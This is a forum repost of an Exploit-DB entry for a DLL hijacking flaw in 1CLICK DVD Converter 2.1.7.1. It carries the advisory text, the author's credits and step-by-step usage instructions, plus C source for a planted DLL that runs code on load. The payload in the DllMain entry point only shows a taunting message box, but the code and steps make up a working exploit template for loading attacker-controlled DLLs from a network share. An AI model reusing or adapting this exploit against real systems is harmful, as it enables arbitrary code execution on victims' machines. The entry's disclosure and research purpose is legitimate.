Exploit 1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34848
Проверка EDB
  1. Пройдено
Автор
ANT!-TR0J4N
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-10-15
1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities
C:
// source: https://www.securityfocus.com/bid/44163/info

// 1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code.

// An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

// LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected. 

/*
#One CLICK DVD Converter 2.1.7.1  DLL Hijacking Exploit (vsoscaler.dll ; swscale.dll ; dvd43.dll )

#Author    :   anT!-Tr0J4n

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends

#special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member

#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com

#Software :   www.lgsoftwareinnovations.com

#Version    :   2.1.7.1

#Tested on:   Windows XP sp3




==========================
How  TO use : Compile and rename to  (vsoscaler.dll ; swscale.dll ; dvd43.dll ) , create a file in the same dir with one of the following extensions.

 check the result -> 0wn3d  
        
==========================

+ vsoscaler.dll

+ swscale.dll
 
+ dvd43.dll


*/
 
#include "stdafx.h"
 
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003);
}
 
 
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}
 
Источник
www.exploit-db.com

Похожие темы